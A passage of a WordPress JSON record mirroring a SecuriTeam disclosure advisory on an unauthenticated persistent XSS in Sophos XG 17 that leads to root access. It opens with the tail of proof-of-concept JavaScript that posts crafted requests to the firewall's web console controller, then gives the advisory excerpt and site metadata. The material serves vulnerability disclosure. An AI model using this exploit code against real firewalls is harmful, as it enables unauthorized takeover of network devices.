class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-30\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-31\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-32\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a53ee9cb7009772174720-33\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-34\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid2&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-40\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-41\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param2<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3612\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 08 Jan 2018 06:21:27 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access found in Sophos XG version 17. Sophos XG Firewall &#8220;provides unprecedented visibility into your network, users, and applications directly from the all-new control center. 
You also get rich on-box reporting and the option to add Sophos iView for centralized &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3612\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[17105,11851,10757,12136],"class_list":["post-11037","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-persistent-xss","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11037","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11037"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11037\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11037"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}
}